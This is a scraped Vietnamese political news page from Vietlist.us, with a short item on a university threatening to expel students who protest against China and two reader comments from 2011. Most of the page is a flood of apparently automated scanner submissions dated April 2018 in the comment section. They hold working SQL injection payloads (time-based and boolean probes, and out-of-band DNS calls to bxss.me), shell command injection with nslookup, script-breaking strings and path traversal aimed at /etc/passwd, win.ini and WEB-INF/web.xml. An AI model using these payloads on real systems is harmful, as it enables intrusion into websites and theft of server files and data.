tittle

bottom


Search Vietlist.us
Search the WebVietnam

covang

covang

covang

covang

covang

covang

covang

covang

covang

covang

covang

covang

covang

covang

Vietnam

covang

Home Page Vietlist.us

Trang Thời Sự dùng đăng tải những bài viết những tin tức có tính cách thời sự. Chúng tôi sẽ đăng tải nếu bài viết thích hợp với lập trường của người Việt Quốc Gia. Xin quý vị gởi bài cho chúng tôi qua email: vietlist09@yahoo.com. Kính chúc quý độc giả vui khỏe.

Trang Thời Sự - Vietlist.us

lacomau
Chủ nghĩa Cộng sản sinh ra trong sự nghèo đói, ngu dốt; lớn lên trong sự dối trá, hận thù; chết đi trong sự khinh bỉ và nguyền rủa của nhân loại.

-------------oo0oo---------------

Bằng chứng đàn áp Sinh Viên của bọn bán nước: Hiệu Trưởng Đặng Công Tráng và Công An VC TP HCM là những tên phản quốc phò bành trướng Bắc Kinh!

Đại học Công Nghiệp : Thông báo dọa đuổi học sinh viên tham gia biểu tình chống TQ

DaiHocCamSVBieuTinh


-------------o0o---------------

Phần Ý Kiến của Đọc Giả

Pham thi Hoa TP HCM - June 11, 2011, 6:04 am
Chung ta bieu tinh de the hien long yeu nuoc, chu khong lam hai den quoc gia. Ngay xua co Hoi Nghi DIEN-HONG, toan dan chong giac ngoai xam, ngay nay ta co dat nuoc phon vinh. Bac HO da noi : Vua HUNG co cong dung nuoc, thi Bac chau ta phai giu nuoc. Toi la phan nu nhi, toi thuoc long cau noi cua nguoi xua : \" Giac den nha dan ba cung danh.

Tran Long, San Jose - June 20, 2011, 4:20 am
Hồ chí Minh và đồng bọn không có công giữ nước. Họ chỉ hoạt động vì quyền lợi của đảng CSVN. Còn đất nước họ cứ lén lút dâng hiến cho Trung cộng.

1 - April 19, 2018, 11:32 am
1

1 - April 19, 2018, 11:32 am
1

response.write(9818575*9002845) - April 19, 2018, 6:32 pm
1

'+response.write(9818575*9002845)+' - April 19, 2018, 6:32 pm
1

"+response.write(9818575*9002845)+" - April 19, 2018, 6:32 pm
1

response.write(9174662*9231693) - April 19, 2018, 6:32 pm
1

'+response.write(9174662*9231693)+' - April 19, 2018, 6:32 pm
1

"+response.write(9174662*9231693)+" - April 19, 2018, 6:32 pm
1

1 - April 19, 2018, 6:32 pm
response.write(9883647*9710635)

1 - April 19, 2018, 6:32 pm
'+response.write(9883647*9710635)+'

1 - April 19, 2018, 6:32 pm
"+response.write(9883647*9710635)+"

1 - April 19, 2018, 6:32 pm
response.write(9240032*9911647)

1 - April 19, 2018, 6:32 pm
'+response.write(9240032*9911647)+'

1 - April 19, 2018, 6:32 pm
"+response.write(9240032*9911647)+"

1 - April 19, 2018, 6:32 pm
1

1 - April 19, 2018, 6:32 pm
1

1 - April 19, 2018, 6:32 pm
1

-1 OR 2+51-51-1=0+0+0+1 -- - April 19, 2018, 6:32 pm
1

-1 OR 3+51-51-1=0+0+0+1 -- - April 19, 2018, 6:32 pm
1

-1 OR 3*2<(0+5+51-51) -- - April 19, 2018, 6:32 pm
1

-1 OR 3*2>(0+5+51-51) -- - April 19, 2018, 6:32 pm
1

-1 OR 2+666-666-1=0+0+0+1 - April 19, 2018, 6:32 pm
1

-1 OR 3+666-666-1=0+0+0+1 - April 19, 2018, 6:32 pm
1

-1 OR 3*2<(0+5+666-666) - April 19, 2018, 6:32 pm
1

-1 OR 3*2>(0+5+666-666) - April 19, 2018, 6:32 pm
1

-1' OR 2+577-577-1=0+0+0+1 -- - April 19, 2018, 6:32 pm
1

-1' OR 3+577-577-1=0+0+0+1 -- - April 19, 2018, 6:32 pm
1

-1' OR 3*2<(0+5+577-577) -- - April 19, 2018, 6:32 pm
1

-1' OR 3*2>(0+5+577-577) -- - April 19, 2018, 6:33 pm
1

1'>"> - April 19, 2018, 6:33 pm
1

-1' OR 2+726-726-1=0+0+0+1 or 'GydRQicS'=' - April 19, 2018, 6:33 pm
1

-1' OR 3+726-726-1=0+0+0+1 or 'GydRQicS'=' - April 19, 2018, 6:33 pm
1

-1' OR 3*2<(0+5+726-726) or 'GydRQicS'=' - April 19, 2018, 6:33 pm
1

-1' OR 3*2>(0+5+726-726) or 'GydRQicS'=' - April 19, 2018, 6:33 pm
1

-1" OR 2+768-768-1=0+0+0+1 -- - April 19, 2018, 6:33 pm
1

-1" OR 3+768-768-1=0+0+0+1 -- - April 19, 2018, 6:33 pm
1

-1" OR 3*2<(0+5+768-768) -- - April 19, 2018, 6:33 pm
1

-1" OR 3*2>(0+5+768-768) -- - April 19, 2018, 6:33 pm
1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ - April 19, 2018, 6:33 pm
1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ - April 19, 2018, 6:33 pm
1

-1; waitfor delay '0:0:9' -- - April 19, 2018, 6:33 pm
1

-1); waitfor delay '0:0:9' -- - April 19, 2018, 6:33 pm
1

1 waitfor delay '0:0:9' -- - April 19, 2018, 6:33 pm
1

64mqFWRE'; waitfor delay '0:0:3' -- - April 19, 2018, 6:33 pm
1

-1;select pg_sleep(3); -- - April 19, 2018, 6:33 pm
1

-1);select pg_sleep(3); -- - April 19, 2018, 6:33 pm
1

-1));select pg_sleep(3); -- - April 19, 2018, 6:33 pm
1

OUZQguNs';select pg_sleep(3); -- - April 19, 2018, 6:33 pm
1

7y94p7PF');select pg_sleep(3); -- - April 19, 2018, 6:33 pm
1

qA09Zksb'));select pg_sleep(6); -- - April 19, 2018, 6:33 pm
1

1 - April 19, 2018, 6:33 pm
1

1||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11359.21.8f9f8.1.bxss'||'.me') - April 19, 2018, 6:33 pm
1

1'>"> - April 19, 2018, 6:33 pm
1

'||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11367.21.8f9f8.1.bxss'||'.me')||' - April 19, 2018, 6:33 pm
1

1 - April 19, 2018, 6:33 pm
1

1;copy (select '') to program 'nslookup dns.sqli.\037203.21-11373.21.8f9f8.\1.bxss.me' - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
1'>">

set|set&set - April 19, 2018, 6:34 pm
1

1';copy (select '') to program 'nslookup dns.sqli.\037203.21-11379.21.8f9f8.\1.bxss.me - April 19, 2018, 6:34 pm
1

525' - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
1

-1 OR 2+271-271-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1 OR 3+271-271-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1 OR 3*2<(0+5+271-271) -- - April 19, 2018, 6:34 pm
1

-1 OR 3*2>(0+5+271-271) -- - April 19, 2018, 6:34 pm
1

-1 OR 2+314-314-1=0+0+0+1 - April 19, 2018, 6:34 pm
1

-1 OR 3+314-314-1=0+0+0+1 - April 19, 2018, 6:34 pm
1

-1 OR 3*2<(0+5+314-314) - April 19, 2018, 6:34 pm
1

-1 OR 3*2>(0+5+314-314) - April 19, 2018, 6:34 pm
1

-1' OR 2+549-549-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1' OR 3+549-549-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1' OR 3*2<(0+5+549-549) -- - April 19, 2018, 6:34 pm
1

-1' OR 3*2>(0+5+549-549) -- - April 19, 2018, 6:34 pm
1

-1' OR 2+101-101-1=0+0+0+1 or 'UvYUYyKS'=' - April 19, 2018, 6:34 pm
1

-1' OR 3+101-101-1=0+0+0+1 or 'UvYUYyKS'=' - April 19, 2018, 6:34 pm
1

-1' OR 3*2<(0+5+101-101) or 'UvYUYyKS'=' - April 19, 2018, 6:34 pm
1

-1' OR 3*2>(0+5+101-101) or 'UvYUYyKS'=' - April 19, 2018, 6:34 pm
1

-1" OR 2+577-577-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1" OR 3+577-577-1=0+0+0+1 -- - April 19, 2018, 6:34 pm
1

-1" OR 3*2<(0+5+577-577) -- - April 19, 2018, 6:34 pm
1

-1" OR 3*2>(0+5+577-577) -- - April 19, 2018, 6:34 pm
1

if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/ - April 19, 2018, 6:34 pm
1

(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/ - April 19, 2018, 6:34 pm
1

-1; waitfor delay '0:0:8' -- - April 19, 2018, 6:34 pm
1

-1); waitfor delay '0:0:8' -- - April 19, 2018, 6:34 pm
1

1 waitfor delay '0:0:8' -- - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
1

HmUl0A9k'; waitfor delay '0:0:12' -- - April 19, 2018, 6:34 pm
1

-1;select pg_sleep(12); -- - April 19, 2018, 6:34 pm
1

-1);select pg_sleep(12); -- - April 19, 2018, 6:34 pm
1

-1));select pg_sleep(12); -- - April 19, 2018, 6:34 pm
1

$(nslookup dns.ce.\037203.21-11385.21.8f9f8.\1.bxss.me) - April 19, 2018, 6:34 pm
1

7txd7A9a';select pg_sleep(12); -- - April 19, 2018, 6:34 pm
1

05nWhxYN');select pg_sleep(12); -- - April 19, 2018, 6:34 pm
1

WjdDdt8u'));select pg_sleep(4); -- - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
1'>">

eSGNEPzI - April 19, 2018, 6:34 pm
1

Pbyx3h5K - April 19, 2018, 6:34 pm
1

1 - April 19, 2018, 6:34 pm
eEQ7VNXt

1 - April 19, 2018, 6:34 pm
3G4MiWAV

&nslookup dns.ce.\037203.21-11391.21.8f9f8.\1.bxss.me&'\"`0&nslookup dns.ce.\037203.21-11391.21.8f9f8.\1.bxss.me&`' - April 19, 2018, 6:34 pm
1

../../../../../../../../../../etc/passwd - April 19, 2018, 6:34 pm
1

set|set&set - April 19, 2018, 6:34 pm
1

1||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11392.21.8f9f8.1.bxss'||'.me') - April 19, 2018, 6:34 pm
1

../../../../../../../../../../../../../../../proc/version - April 19, 2018, 6:34 pm
1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg - April 19, 2018, 6:34 pm
1

../../../../../../../../../../etc/passwd.jpg - April 19, 2018, 6:34 pm
1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg - April 19, 2018, 6:34 pm
1

/../..//../..//../..//../..//../..//etc/passwd.jpg - April 19, 2018, 6:34 pm
1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd - April 19, 2018, 6:34 pm
1

/etc/passwd - April 19, 2018, 6:34 pm
1

%2fetc%2fpasswd - April 19, 2018, 6:34 pm
1

/.././.././.././.././.././.././.././../etc/./passwd%00 - April 19, 2018, 6:34 pm
1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd - April 19, 2018, 6:34 pm
1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd - April 19, 2018, 6:34 pm
1

................etc/passwd - April 19, 2018, 6:34 pm
1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. - April 19, 2018, 6:34 pm
1

file:///etc/passwd - April 19, 2018, 6:34 pm
1

/\../\../\../\../\../\../\../etc/passwd - April 19, 2018, 6:34 pm
1

WEB-INF/web.xml - April 19, 2018, 6:34 pm
1

/WEB-INF/web.xml - April 19, 2018, 6:34 pm
1

WEB-INF\web.xml - April 19, 2018, 6:34 pm
1

../../../../../../../../../../windows/win.ini - April 19, 2018, 6:34 pm
1

C:\WINDOWS\system32\drivers\etc\hosts - April 19, 2018, 6:34 pm
1

../../../../../../../../../../windows/win.ini.jpg - April 19, 2018, 6:34 pm
1

windowswin.ini - April 19, 2018, 6:34 pm
1

................windowswin.ini - April 19, 2018, 6:34 pm
1

..\..\..\..\..\..\..\..\windows\win.ini - April 19, 2018, 6:34 pm
1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini - April 19, 2018, 6:34 pm
1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini - April 19, 2018, 6:35 pm
1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini - April 19, 2018, 6:35 pm
1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ - April 19, 2018, 6:35 pm
1

WEB-INF/web.xml - April 19, 2018, 6:35 pm
1

WEB-INF\web.xml - April 19, 2018, 6:35 pm
1

../../../../../../../../../../etc/passwd - April 19, 2018, 6:35 pm
1

$(nslookup dns.ce.\037203.21-11398.21.8f9f8.\1.bxss.me) - April 19, 2018, 6:35 pm
1

../../../../../../../../../../../../../../../proc/version - April 19, 2018, 6:35 pm
1

'||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11399.21.8f9f8.1.bxss'||'.me')||' - April 19, 2018, 6:35 pm
1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg - April 19, 2018, 6:35 pm
1

../../../../../../../../../../etc/passwd.jpg - April 19, 2018, 6:35 pm
1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg - April 19, 2018, 6:35 pm
1

/../..//../..//../..//../..//../..//etc/passwd.jpg - April 19, 2018, 6:35 pm
1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd - April 19, 2018, 6:35 pm
1

/etc/passwd - April 19, 2018, 6:35 pm
1

%2fetc%2fpasswd - April 19, 2018, 6:35 pm
1

/.././.././.././.././.././.././.././../etc/./passwd%00 - April 19, 2018, 6:35 pm
1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd - April 19, 2018, 6:35 pm
1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd - April 19, 2018, 6:35 pm
1

................etc/passwd - April 19, 2018, 6:35 pm
1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. - April 19, 2018, 6:35 pm
1

file:///etc/passwd - April 19, 2018, 6:35 pm
1

/\../\../\../\../\../\../\../etc/passwd - April 19, 2018, 6:35 pm
1

WEB-INF/web.xml - April 19, 2018, 6:35 pm
1

/WEB-INF/web.xml - April 19, 2018, 6:35 pm
1

WEB-INF\web.xml - April 19, 2018, 6:35 pm
1

../../../../../../../../../../windows/win.ini - April 19, 2018, 6:35 pm
1

C:\WINDOWS\system32\drivers\etc\hosts - April 19, 2018, 6:35 pm
1

../../../../../../../../../../windows/win.ini.jpg - April 19, 2018, 6:35 pm
1

windowswin.ini - April 19, 2018, 6:35 pm
1

................windowswin.ini - April 19, 2018, 6:35 pm
1

..\..\..\..\..\..\..\..\windows\win.ini - April 19, 2018, 6:35 pm
1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini - April 19, 2018, 6:35 pm
1

&nslookup dns.ce.\037203.21-11404.21.8f9f8.\1.bxss.me&'\"`0&nslookup dns.ce.\037203.21-11404.21.8f9f8.\1.bxss.me&`' - April 19, 2018, 6:35 pm
1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini - April 19, 2018, 6:35 pm
1

1;copy (select '') to program 'nslookup dns.sqli.\037203.21-11405.21.8f9f8.\1.bxss.me' - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
set|set&set

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini - April 19, 2018, 6:35 pm
1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.